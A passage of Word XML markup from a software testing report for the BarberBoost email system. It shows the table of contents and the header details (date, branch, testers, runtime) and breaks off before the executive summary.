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Oswald" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="-1274856737"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="728FB20C" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00CD0784">
            <w:rPr>
              <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0DAE6A0D" w14:textId="77777777" w:rsidR="00020772" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00CD0784">
            <w:rPr>
              <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00CD0784">
            <w:rPr>
              <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
            <w:instrText>TOC \o "1-2" \h \z \u</w:instrText>
          </w:r>
          <w:r w:rsidRPr="00CD0784">
            <w:rPr>
              <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc228978580" w:history="1">
            <w:r w:rsidR="00020772" w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>BarberBoost — Email System: Test Cases &amp; Final Testing Report</w:t>
            </w:r>
            <w:r w:rsidR="00020772" w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00020772" w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00020772" w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228978580 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00020772" w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00020772" w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00020772" w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00020772" w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="77273994" w14:textId="77777777" w:rsidR="00020772" w:rsidRPr="00CD0784" w:rsidRDefault="00020772">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc228978581" w:history="1">
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>1. Executive Summary</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_Toc228978581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1</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="36D8E032" w14:textId="77777777" w:rsidR="00020772" w:rsidRPr="00CD0784" w:rsidRDefault="00020772">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc228978582" w:history="1">
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>2. Scope</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_Toc228978582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2</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="391DBAB4" w14:textId="77777777" w:rsidR="00020772" w:rsidRPr="00CD0784" w:rsidRDefault="00020772">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc228978583" w:history="1">
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>3. Test Environment</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_Toc228978583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3</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44904B61" w14:textId="77777777" w:rsidR="00020772" w:rsidRPr="00CD0784" w:rsidRDefault="00020772">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc228978584" w:history="1">
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>4. Branch Comparison: main vs development</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_Toc228978584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3</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6EA8A6B8" w14:textId="77777777" w:rsidR="00020772" w:rsidRPr="00CD0784" w:rsidRDefault="00020772">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc228978585" w:history="1">
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>5. Test Cases</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_Toc228978585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4</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5710E2EB" w14:textId="77777777" w:rsidR="00020772" w:rsidRPr="00CD0784" w:rsidRDefault="00020772">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc228978586" w:history="1">
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>6. Bug Report</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_Toc228978586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18</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3DDE37CC" w14:textId="77777777" w:rsidR="00020772" w:rsidRPr="00CD0784" w:rsidRDefault="00020772">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc228978587" w:history="1">
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>7. Live Delivery Evidence</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_Toc228978587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19</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="110F7291" w14:textId="77777777" w:rsidR="00020772" w:rsidRPr="00CD0784" w:rsidRDefault="00020772">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc228978588" w:history="1">
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>8. Known Issues &amp; Recommendations</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_Toc228978588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19</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18AAD5E8" w14:textId="77777777" w:rsidR="00020772" w:rsidRPr="00CD0784" w:rsidRDefault="00020772">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc228978589" w:history="1">
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>9. Test Asset</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_Toc228978589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21</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6CDCE5B8" w14:textId="77777777" w:rsidR="00020772" w:rsidRPr="00CD0784" w:rsidRDefault="00020772">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc228978590" w:history="1">
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>10. Sign-off</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228978590 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7165A5C6" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00CD0784">
            <w:rPr>
              <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="6395865A" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="C9A84C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc228978580"/>
      <w:bookmarkStart w:id="1" w:name="Xb02337db40097a0210e7944aebbd6725b781278"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="C9A84C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BarberBoost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="C9A84C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Email System: Test Cases &amp; Final Testing Report</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="7A501A69" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Date:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7 May 2026</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Branch tested:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>development</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (commit </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3fd2e2f</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tester:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Claude Code (automated) + Dan Jatau</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Email provider:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Resend v6.10.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Runtime:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Node.js v22.14.0 / Next.js 16.2.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1227AD" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="3A52816A">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="498909AA" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="C9A84C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc228978581"/>
      <w:bookmarkStart w:id="3" w:name="executive-summary"/>
      <w:r w:rsidRPr="00CD0784">
